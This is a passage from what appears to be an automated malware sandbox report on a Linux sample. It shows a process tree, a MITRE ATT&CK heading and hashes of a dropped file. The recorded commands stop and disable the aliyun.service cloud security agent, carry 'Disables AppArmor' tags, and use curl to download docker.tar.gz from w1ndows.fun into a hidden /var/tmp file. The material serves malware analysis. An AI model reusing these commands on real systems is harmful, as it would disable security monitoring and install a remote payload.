                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl --quiet is-active multi-user.target
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1895
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1898
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl list-unit-files --full "--type=socket"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1897
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/local/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/local/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Disables AppArmor
    PID:1889
  • /usr/bin/systemctl
    systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
    2⤵
    • Disables AppArmor
    PID:1889
  • /sbin/systemctl
    systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
    2⤵
    • Disables AppArmor
    PID:1889
  • /bin/systemctl
    systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
    2⤵
    • Disables AppArmor
    PID:1889
  • /bin/systemctl
    systemctl disable aliyun.service
    2⤵
    • Disables AppArmor
    PID:1905
  • /usr/bin/curl
    curl https://w1ndows.fun:8443/docker.tar.gz -o /var/tmp/.docker.tar.gz
    2⤵
      PID:1909

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/log_rot

    Filesize

    5B

    MD5

    727479ef7cedf30c03459bec7d87b0f0

    SHA1

    2082e7f715f058acab2398d25d135cf5f4c0ce41

    SHA256

    29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

    SHA512

    4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba